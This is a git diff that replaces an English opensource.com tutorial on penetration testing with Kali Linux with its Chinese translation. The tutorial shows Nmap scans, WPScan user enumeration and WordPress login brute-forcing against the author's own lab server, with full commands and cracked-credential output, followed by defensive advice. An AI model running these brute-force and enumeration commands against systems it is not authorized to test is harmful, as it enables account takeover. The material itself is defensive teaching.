diff --git a/sources/tech/20210525 Pen testing with Linux security tools.md b/sources/tech/20210525 Pen testing with Linux security tools.md
deleted file mode 100644
index 3499610346..0000000000
--- a/sources/tech/20210525 Pen testing with Linux security tools.md
+++ /dev/null
@@ -1,295 +0,0 @@
-[#]: subject: (Pen testing with Linux security tools)
-[#]: via: (https://opensource.com/article/21/5/linux-security-tools)
-[#]: author: (Peter Gervase https://opensource.com/users/pgervase)
-[#]: collector: (lujun9972)
-[#]: translator: (MjSeven)
-[#]: reviewer: ( )
-[#]: publisher: ( )
-[#]: url: ( )
-
-Pen testing with Linux security tools
-======
-Use Kali Linux and other open source tools to uncover security gaps and
-weaknesses in your systems.
-![Magnifying glass on code][1]
-
-The multitude of well-publicized breaches of large consumer corporations underscores the critical importance of system security management. Fortunately, there are many different applications that help secure computer systems. One is [Kali][2], a Linux distribution developed for security and penetration testing. This article demonstrates how to use Kali Linux to investigate your system to find weaknesses.
-
-Kali installs a lot of tools, all of which are open source, and having them installed by default makes things easier.
-
-![Kali's tools][3]
-
-(Peter Gervase, [CC BY-SA 4.0][4])
-
-The systems that I'll use in this tutorial are:
-
- 1. `kali.usersys.redhat.com`: This is the system where I'll launch the scans and attacks. It has 30GB of memory and six virtualized CPUs (vCPUs).
- 2. `vulnerable.usersys.redhat.com`: This is a Red Hat Enterprise Linux 8 system that will be the target. It has 16GB of memory and six vCPUs. This is a relatively up-to-date system, but some packages might be out of date.
- 3. This system also includes `httpd-2.4.37-30.module+el8.3.0+7001+0766b9e7.x86_64`, `mariadb-server-10.3.27-3.module+el8.3.0+8972+5e3224e9.x86_64`, `tigervnc-server-1.9.0-15.el8_1.x86_64`, `vsftpd-3.0.3-32.el8.x86_64`, and WordPress version 5.6.1.
-
-
-
-I included the hardware specifications above because some of these tasks are pretty demanding, especially for the target system's CPU when running the WordPress Security Scanner ([WPScan][5]).
-
-### Investigate your system
-
-I started my investigation with a basic Nmap scan on my target system. (You can dive deeper into Nmap by reading [Using Nmap results to help harden Linux systems][6].) An Nmap scan is a quick way to get an overview of which ports and services are visible from the system initiating the Nmap scan.
-
-![Nmap scan][7]
-
-(Peter Gervase, [CC BY-SA 4.0][4])
-
-This default scan shows that there are several possibly interesting open ports. In reality, any open port is possibly interesting because it could be a way for an attacker to breach your network. In this example, ports 21, 22, 80, and 443 are nice to scan because they are commonly used services. At this early stage, I'm simply doing reconnaissance work and trying to get as much information about the target system as I can.
-
-I want to investigate port 80 with Nmap, so I use the `-p 80` argument to look at port 80 and `-A` to get information such as the operating system and application version.
-
-![Nmap scan of port 80][8]
-
-(Peter Gervase, [CC BY-SA 4.0][4])
-
-Some of the key lines in this output are:
-
-
-```
-PORT STATE SERVICE VERSION
-80/tcp open http Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
-|_http-generator: WordPress 5.6.1
-```
-
-Since I now know this is a WordPress server, I can use WPScan to get information about potential weaknesses. A good investigation to run is to try to find some usernames. Using `--enumerate u` tells WPScan to look for users in the WordPress instance. For example:
-
-
-```
-┌──(root💀kali)-[~]
-└─# wpscan --url vulnerable.usersys.redhat.com --enumerate u
-_______________________________________________________________
- __ _______ _____
- \ \ / / __ \ / ____|
- \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
- \ \/ \/ / | ___/ \\___ \ / __|/ _` | '_ \
- \ /\ / | | ____) | (__| (_| | | | |
- \/ \/ |_| |_____/ \\___|\\__,_|_| |_|
-
- WordPress Security Scanner by the WPScan Team
- Version 3.8.10
- Sponsored by Automattic -
- @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
-_______________________________________________________________
-
-[+] URL: [10.19.47.242]
-[+] Started: Tue Feb 16 21:38:49 2021
-
-Interesting Finding(s):
-...
-[i] User(s) Identified:
-
-[+] admin
- | Found By: Author Posts - Display Name (Passive Detection)
- | Confirmed By:
- | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- | Login Error Messages (Aggressive Detection)
-
-[+] pgervase
- | Found By: Author Posts - Display Name (Passive Detection)
- | Confirmed By:
- | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
- | Login Error Messages (Aggressive Detection)
-```
-
-This shows there are two users: `admin` and `pgervase`. I'll try to guess the password for `admin` by using a password dictionary, which is a text file with lots of possible passwords. The dictionary I used was 37G and had 3,543,076,137 lines.
-
-Like there are multiple text editors, web browsers, and other applications you can choose from, there are multiple tools available to launch password attacks. Here are two example commands using Nmap and WPScan:
-
-
-```
-`# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=/path/to/passworddb,threads=6 vulnerable.usersys.redhat.com`[/code] [code]`# wpscan --url vulnerable.usersys.redhat.com --passwords /path/to/passworddb --usernames admin --max-threads 50 | tee nmap.txt`
-```
-
-This Nmap script is one of many possible scripts I could have used, and scanning the URL with WPScan is just one of many possible tasks this tool can do. You can decide which you would prefer to use
-
-This WPScan example shows the password at the end of the file:
-
-
-```
-┌──(root💀kali)-[~]
-└─# wpscan --url vulnerable.usersys.redhat.com --passwords passwords.txt --usernames admin
-_______________________________________________________________
- __ _______ _____
- \ \ / / __ \ / ____|
- \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
- \ \/ \/ / | ___/ \\___ \ / __|/ _` | '_ \
- \ /\ / | | ____) | (__| (_| | | | |
- \/ \/ |_| |_____/ \\___|\\__,_|_| |_|
-
- WordPress Security Scanner by the WPScan Team
- Version 3.8.10
- Sponsored by Automattic -
- @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
-_______________________________________________________________
-
-[+] URL: [10.19.47.242]
-[+] Started: Thu Feb 18 20:32:13 2021
-
-Interesting Finding(s):
-
-…..
-
-[+] Performing password attack on Wp Login against 1 user/s
-Trying admin / redhat Time: 00:01:57 <==================================================================================================================> (3231 / 3231) 100.00% Time: 00:01:57
-Trying admin / redhat Time: 00:01:57 <========================================================= > (3231 / 6462) 50.00% ETA: ??:??:??
-[SUCCESS] - admin / redhat
-
-[!] Valid Combinations Found:
- | Username: admin, Password: redhat
-
-[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
-[!] You can get a free API token with 50 daily requests by registering at
-
-[+] Finished: Thu Feb 18 20:34:15 2021
-[+] Requests Done: 3255
-[+] Cached Requests: 34
-[+] Data Sent: 1.066 MB
-[+] Data Received: 24.513 MB
-[+] Memory used: 264.023 MB
-[+] Elapsed time: 00:02:02
-```
-
-The Valid Combinations Found section near the end contains the admin username and password. It took only two minutes to go through 3,231 lines.
-
-I have another dictionary file with 3,238,659,984 unique entries, which would take much longer and leave a lot more evidence.
-
-Using Nmap produces a result much faster:
-
-
-```
-┌──(root💀kali)-[~]
-└─# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=password.txt,threads=6 vulnerable.usersys.redhat.com
-Starting Nmap 7.91 ( ) at 2021-02-18 20:48 EST
-Nmap scan report for vulnerable.usersys.redhat.com (10.19.47.242)
-Host is up (0.00015s latency).
-Not shown: 995 closed ports
-PORT STATE SERVICE VERSION
-21/tcp open ftp vsftpd 3.0.3
-22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
-80/tcp open http Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
-|_http-server-header: Apache/2.4.37 (Red Hat Enterprise Linux)
-| http-wordpress-brute:
-| Accounts:
-| admin:redhat - Valid credentials <<<<<<<
-| pgervase:redhat - Valid credentials <<<<<<<
-|_ Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
-111/tcp open rpcbind 2-4 (RPC #100000)
-| rpcinfo:
-| program version port/proto service
-| 100000 2,3,4 111/tcp rpcbind
-| 100000 2,3,4 111/udp rpcbind
-| 100000 3,4 111/tcp6 rpcbind
-|_ 100000 3,4 111/udp6 rpcbind
-3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB
-MAC Address: 52:54:00:8C:A1:C0 (QEMU virtual NIC)
-Service Info: OS: Unix
-
-Service detection performed. Please report any incorrect results at .
-Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds
-```
-
-However, running a scan like this can leave a flood of HTTPD logging messages on the target system:
-
-
-```
-10.19.47.170 - - [18/Feb/2021:20:14:01 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
-10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
-10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
-10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
-10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
-10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
-10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
-10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
-10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
-```
-
-To get information about the HTTPS server found in my initial Nmap scan, I used the `sslscan` command:
-
-
-```
-┌──(root💀kali)-[~]
-└─# sslscan vulnerable.usersys.redhat.com
-Version: 2.0.6-static
-OpenSSL 1.1.1i-dev xx XXX xxxx
-
-Connected to 10.19.47.242
-
-Testing SSL server vulnerable.usersys.redhat.com on port 443 using SNI name vulnerable.usersys.redhat.com
-
- SSL/TLS Protocols:
-SSLv2 disabled
-SSLv3 disabled
-TLSv1.0 disabled
-TLSv1.1 disabled
-TLSv1.2 enabled
-TLSv1.3 enabled
-<snip>
-```
-
-This shows information about the enabled SSL protocols and, further down in the output, information about the Heartbleed vulnerability:
-
-
-```
- Heartbleed:
-TLSv1.3 not vulnerable to heartbleed
-TLSv1.2 not vulnerable to heartbleed
-```
-
-### Tips for preventing or mitigating attackers
-
-There are many ways to defend your systems against the multitude of attackers out there. A few key points are:
-
- * **Know your systems:** This includes knowing which ports are open, what ports should be open, who should be able to see those open ports, and what is the expected traffic on those services. Nmap is a great tool to learn about systems on the network.
- * **Use current best practices:** What is considered a best practice today might not be a best practice down the road. As an admin, it's important to stay up to date on trends in the infosec realm.
- * **Know how to use your products:** For example, rather than letting an attacker continually hammer away at your WordPress system, block their IP address and limit the number of times they can try to log in before getting blocked. Blocking the IP address might not be as helpful in the real world because attackers are likely to use compromised systems to launch attacks. However, it's an easy setting to enable and could block some attacks.
- * **Maintain and verify good backups:** If an attacker comprises one or more of your systems, being able to rebuild from known good and clean backups could save lots of time and money.
- * **Check your logs:** As the examples above show, scanning and penetration commands may leave lots of logs indicating that an attacker is targeting the system. If you notice them, you can take preemptive action to mitigate the risk.
- * **Update your systems, their applications, and any extra modules:** As [NIST Special Publication 800-40r3][9] explains, "patches are usually the most effective way to mitigate software flaw vulnerabilities, and are often the only fully effective solution."
- * **Use the tools your vendors provide:** Vendors have different tools to help you maintain their systems, so make sure you take advantage of them. For example, [Red Hat Insights][10], included with Red Hat Enterprise Linux subscriptions, can help tune your systems and alert you to potential security threats.
-
-
-
-### Learn more
-
-This introduction to security tools and how to use them is just the tip of the iceberg. To dive deeper, you might want to look into the following resources:
-
- * [Armitage][11], an open source attack management tool
- * [Red Hat Product Security Center][12]
- * [Red Hat Security Channel][13]
- * [NIST's Cybersecurity page][14]
- * [Using Nmap results to help harden Linux systems][6]
-
-
-
---------------------------------------------------------------------------------
-
-via: https://opensource.com/article/21/5/linux-security-tools
-
-作者:[Peter Gervase][a]
-选题:[lujun9972][b]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]: https://opensource.com/users/pgervase
-[b]: https://github.com/lujun9972
-[1]: https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/find-file-linux-code_magnifying_glass_zero.png?itok=E2HoPDg0 (Magnifying glass on code)
-[2]: https://www.kali.org/
-[3]: https://opensource.com/sites/default/files/uploads/kali-tools.png (Kali's tools)
-[4]: https://creativecommons.org/licenses/by-sa/4.0/
-[5]: https://wpscan.com/wordpress-security-scanner
-[6]: https://www.redhat.com/sysadmin/using-nmap-harden-systems
-[7]: https://opensource.com/sites/default/files/uploads/nmap-scan.png (Nmap scan)
-[8]: https://opensource.com/sites/default/files/uploads/nmap-port80.png (Nmap scan of port 80)
-[9]: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-40r3.pdf%5D(https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-40r3.pdf
-[10]: https://www.redhat.com/sysadmin/how-red-hat-insights
-[11]: https://en.wikipedia.org/wiki/Armitage_(computing)
-[12]: https://access.redhat.com/security
-[13]: https://www.redhat.com/en/blog/channel/security
-[14]: https://www.nist.gov/cybersecurity
diff --git a/translated/tech/20210525 Pen testing with Linux security tools.md b/translated/tech/20210525 Pen testing with Linux security tools.md
new file mode 100644
index 0000000000..0e686621be
--- /dev/null
+++ b/translated/tech/20210525 Pen testing with Linux security tools.md
@@ -0,0 +1,296 @@
+[#]: subject: "Pen testing with Linux security tools"
+[#]: via: "https://opensource.com/article/21/5/linux-security-tools"
+[#]: author: "Peter Gervase https://opensource.com/users/pgervase"
+[#]: collector: "lujun9972"
+[#]: translator: "MjSeven"
+[#]: reviewer: " "
+[#]: publisher: " "
+[#]: url: " "
+
+使用 Linux 安全工具进行渗透测试
+======
+使用 Kali Linux 和其他开源工具来发现系统中的安全漏洞和弱点。
+![Magnifying glass on code][1]
+
+大量广泛报道的大型消费企业入侵事件凸显了系统安全管理的重要性。幸运的是,有许多不同的应用程序可以帮助保护计算机系统。其中一个是 [Kali][2],一个为安全和渗透测试而开发的 Linux 发行版。本文演示了如何使用 Kali Linux 来审视你的系统以发现威胁。
+
+Kali 安装了很多工具,它们都是开源的,默认情况下安装它们会让事情变得更容易。
+
+![Kali's tools][3]
+
+(Peter Gervase, [CC BY-SA 4.0][4])
+
+本文使用的系统是:
+
+ 1. `kali.usersts.redhat.com`:我会启动扫描和攻击的系统。它拥有 30GB 内存和 6 个虚拟 CPU(vCPU)。
+ 2. `vulnerable.usersys.redhat.com`: Red Hat 企业版 Linux 8 系统,它也会成为目标。它拥有 16GB 内存和 6 个 vCPU。它是一个相对较新的系统,但有些软件包可能已经过时。
+ 3. 这个系统还将包括 `httpd-2.4.37-30.module+el8.3.0+7001+0766b9e7.x86_64`、 `mariadb-server-10.3.27-3.module+el8.3.0+8972+5e3224e9.x86_64`、 `tigervnc-server-1.9.0-15.el8_1.x86_64`、 `vsftpd-3.0.3-32.el8.x86_64` 和一个 5.6.1 版本的 WordPress。
+
+我在上面列出了硬件规格,因为一些任务要求很高,尤其是在运行 WordPress 安全扫描程序([WPScan][5])时对目标系统 CPU 的要求。
+
+### 探测你的系统
+
+首先,我会在目标系统上进行基本的 Nmap 扫描(你可以阅读[使用 Nmap 结果帮助加固 Linux 系统][6]一文来更深入地了解 Nmap)。Nmap 扫描是一种快速的方法,可以大致了解被测系统中哪些端口和服务是暴露的。
+
+![Nmap scan][7]
+
+(Peter Gervase, [CC BY-SA 4.0][4])
+
+默认扫描显示有几个你可能感兴趣的开放端口。实际上,任何开放端口都可能成为攻击者破坏你网络的一种方式。在本例中,端口 21、22、80 和 443 很容易扫描,因为它们是常用服务的端口。在这个早期阶段,我只是在做侦察工作,尽可能多地获取有关目标系统的信息。
+
+我想用 Nmap 侦察 80 端口,所以我使用 `-p 80` 参数来查看端口 80,`-A` 参数来获取操作系统和应用程序版本等信息。
+
+![Nmap scan of port 80][8]
+
+(Peter Gervase, [CC BY-SA 4.0][4])
+
+关键信息有:
+
+
+```bash
+PORT STATE SERVICE VERSION
+80/tcp open http Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
+|_http-generator: WordPress 5.6.1
+```
+
+现在我知道了这是一个 WordPress 服务器,我可以使用 WPScan 来获取有关潜在威胁的信息。一个很好的侦察方法是尝试找到一些用户名,使用 `--enumerate u` 告诉 WPScan 在 WordPress 实例中查找用户名。例如:
+
+
+```bash
+┌──(root💀kali)-[~]
+└─# wpscan --url vulnerable.usersys.redhat.com --enumerate u
+_______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \\___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \\___|\\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.8.10
+ Sponsored by Automattic -
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+_______________________________________________________________
+
+[+] URL: [10.19.47.242]
+[+] Started: Tue Feb 16 21:38:49 2021
+
+Interesting Finding(s):
+...
+[i] User(s) Identified:
+
+[+] admin
+ | Found By: Author Posts - Display Name (Passive Detection)
+ | Confirmed By:
+ | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
+ | Login Error Messages (Aggressive Detection)
+
+[+] pgervase
+ | Found By: Author Posts - Display Name (Passive Detection)
+ | Confirmed By:
+ | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
+ | Login Error Messages (Aggressive Detection)
+```
+
+显示有两个用户:`admin` 和 `pgervase`。我将尝试使用密码字典来猜测 `admin` 的密码。密码字典是一个包含很多密码的文本文件。我使用的字典大小有 37G,有 3,543,076,137 行。
+
+就像你可以选择不同的文本编辑器、Web 浏览器和其他应用程序 一样,也有很多工具可以启动密码攻击。下面是两个使用 Nmap 和 WPScan 的示例命令:
+
+
+```shell
+# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=/path/to/passworddb,threads=6 vulnerable.usersys.redhat.com
+```
+
+```bash
+# wpscan --url vulnerable.usersys.redhat.com --passwords /path/to/passworddb --usernames admin --max-threads 50 | tee nmap.txt
+```
+
+这个 Nmap 脚本是我使用的许多脚本之一,使用 WPScan 扫描 URL 只是这个工具可以完成的许多任务之一。你可以决定你喜欢的那一个。
+
+WPScan 示例在文件末尾显示了密码:
+
+
+```bash
+┌──(root💀kali)-[~]
+└─# wpscan --url vulnerable.usersys.redhat.com --passwords passwords.txt --usernames admin
+_______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.8.10
+ Sponsored by Automattic - https://automattic.com/
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
+_______________________________________________________________
+
+[+] URL: http://vulnerable.usersys.redhat.com/ [10.19.47.242]
+[+] Started: Thu Feb 18 20:32:13 2021
+
+Interesting Finding(s):
+
+…..
+
+[+] Performing password attack on Wp Login against 1 user/s
+Trying admin / redhat Time: 00:01:57 <==================================================================================================================> (3231 / 3231) 100.00% Time: 00:01:57
+Trying admin / redhat Time: 00:01:57 <========================================================= > (3231 / 6462) 50.00% ETA: ??:??:??
+[SUCCESS] - admin / redhat
+
+[!] Valid Combinations Found:
+ | Username: admin, Password: redhat
+
+[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
+[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
+
+[+] Finished: Thu Feb 18 20:34:15 2021
+[+] Requests Done: 3255
+[+] Cached Requests: 34
+[+] Data Sent: 1.066 MB
+[+] Data Received: 24.513 MB
+[+] Memory used: 264.023 MB
+[+] Elapsed time: 00:02:02
+```
+
+在末尾的有效组合部分包含管理员用户名和密码,3231 行只用了两分钟。
+
+我还有另一个字典文件,其中包含 3,238,659,984 行,使用它花费的时间更长并且会留下更多的证据。
+
+使用 Nmap 可以更快地产生结果:
+
+
+```
+┌──(root💀kali)-[~]
+└─# nmap -sV --script http-wordpress-brute --script-args userdb=users.txt,passdb=password.txt,threads=6 vulnerable.usersys.redhat.com
+Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-18 20:48 EST
+Nmap scan report for vulnerable.usersys.redhat.com (10.19.47.242)
+Host is up (0.00015s latency).
+Not shown: 995 closed ports
+PORT STATE SERVICE VERSION
+21/tcp open ftp vsftpd 3.0.3
+22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
+80/tcp open http Apache httpd 2.4.37 ((Red Hat Enterprise Linux))
+|_http-server-header: Apache/2.4.37 (Red Hat Enterprise Linux)
+| http-wordpress-brute:
+| Accounts:
+| admin:redhat - Valid credentials <<<<<<<
+| pgervase:redhat - Valid credentials <<<<<<<
+|_ Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0
+111/tcp open rpcbind 2-4 (RPC #100000)
+| rpcinfo:
+| program version port/proto service
+| 100000 2,3,4 111/tcp rpcbind
+| 100000 2,3,4 111/udp rpcbind
+| 100000 3,4 111/tcp6 rpcbind
+|_ 100000 3,4 111/udp6 rpcbind
+3306/tcp open mysql MySQL 5.5.5-10.3.27-MariaDB
+MAC Address: 52:54:00:8C:A1:C0 (QEMU virtual NIC)
+Service Info: OS: Unix
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 7.68 seconds
+```
+
+然而,运行这样的扫描可能会在目标系统上留下大量的 HTTPD 日志消息:
+
+
+```shell
+10.19.47.170 - - [18/Feb/2021:20:14:01 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
+10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
+10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
+10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
+10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
+10.19.47.170 - - [18/Feb/2021:20:14:00 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
+10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
+10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
+10.19.47.170 - - [18/Feb/2021:20:14:02 -0500] "POST /wp-login.php HTTP/1.1" 200 7575 "" "WPScan v3.8.10 ()"
+```
+
+为了获得关于在最初的 Nmap 扫描中发现的 HTTPS 服务器的信息,我使用了 `sslscan` 命令:
+
+
+```bash
+┌──(root💀kali)-[~]
+└─# sslscan vulnerable.usersys.redhat.com
+Version: 2.0.6-static
+OpenSSL 1.1.1i-dev xx XXX xxxx
+
+Connected to 10.19.47.242
+
+Testing SSL server vulnerable.usersys.redhat.com on port 443 using SNI name vulnerable.usersys.redhat.com
+
+ SSL/TLS Protocols:
+SSLv2 disabled
+SSLv3 disabled
+TLSv1.0 disabled
+TLSv1.1 disabled
+TLSv1.2 enabled
+TLSv1.3 enabled
+
+```
+
+它显示了有关启用的 SSL 协议的信息,在最下方,是关于 Heartbleed 漏洞的信息:
+
+
+```bash
+ Heartbleed:
+TLSv1.3 not vulnerable to heartbleed
+TLSv1.2 not vulnerable to heartbleed
+```
+
+### 防御或减轻攻击的技巧
+
+有很多方法可以保护你的系统免受大量攻击。几个关键点是:
+
+ * **了解你的系统:**包括了解哪些端口是开放的,哪些端口应该开放,谁应该能够看到这些开放的端口,以及使用这些端口服务的预期流量是多少。Nmap 是了解网络系统的一个绝佳工具。
+ * **使用最新的最佳实践:** 现在的最佳实践可能不是未来的最佳实践。作为管理员,了解信息安全领域的最新趋势非常重要。
+ * **知道如何使用你的产品:** 例如,与其让攻击者不断攻击你的 WordPress 系统,不如阻止他们的 IP 地址并限制尝试登录的次数。在现实世界中,阻止 IP 地址可能没有那么有用,因为攻击者可能会使用受感染的系统来发起攻击。但是,这是一个很容易启用的设置,可以阻止一些攻击。
+ * **维护和验证良好的备份:** 如果攻击者攻击了一个或多个系统,能从已知的良好和干净的备份中重新构建可以节省大量时间和金钱。
+ * **检查日志:** 如上所示,扫描和渗透命令可能会留下大量日志,这表明攻击者正在攻击系统。如果你注意到它们,可以采取先发制人的行动来降低风险。
+ * **更新系统、应用程序和任何额外的模块:** 正如 [NIST Special Publication 800-40r3][9] 所解释的那样,“补丁通常是减轻软件缺陷漏洞最有效的方法,而且通常是唯一完全有效的解决方案。”
+ * **使用供应商提供的工具:** 供应商有不同的工具来帮助你维护他们的系统,因此一定要充分利用它们。例如,红帽企业 Linux 订阅中包含的 [Red Hat Insights][10] 可以帮助你优化系统并提醒你注意潜在的安全威胁。
+
+
+
+### 了解更多
+
+本文对安全工具及其使用方法的介绍只是冰山一角。深入了解的话,你可能需要查看以下资源:
+
+ * [Armitage][11],一个开源的攻击管理工具
+ * [Red Hat 产品安全中心][12]
+ * [Red Hat 安全频道][13]
+ * [NIST 网络安全页面][14]
+ * [使用 Nmap 结果来帮助加固 Linux 系统][6]
+
+
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/article/21/5/linux-security-tools
+
+作者:[Peter Gervase][a]
+选题:[lujun9972][b]
+译者:[MjSeven](https://github.com/MjSeven)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://opensource.com/users/pgervase
+[b]: https://github.com/lujun9972
+[1]: https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/find-file-linux-code_magnifying_glass_zero.png?itok=E2HoPDg0 "Magnifying glass on code"
+[2]: https://www.kali.org/
+[3]: https://opensource.com/sites/default/files/uploads/kali-tools.png "Kali's tools"
+[4]: https://creativecommons.org/licenses/by-sa/4.0/
+[5]: https://wpscan.com/wordpress-security-scanner
+[6]: https://www.redhat.com/sysadmin/using-nmap-harden-systems
+[7]: https://opensource.com/sites/default/files/uploads/nmap-scan.png "Nmap scan"
+[8]: https://opensource.com/sites/default/files/uploads/nmap-port80.png "Nmap scan of port 80"
+[9]: https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-40r3.pdf%5D(https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-40r3.pdf
+[10]: https://www.redhat.com/sysadmin/how-red-hat-insights
+[11]: https://en.wikipedia.org/wiki/Armitage_(computing)
+[12]: https://access.redhat.com/security
+[13]: https://www.redhat.com/en/blog/channel/security
+[14]: https://www.nist.gov/cybersecurity
\ No newline at end of file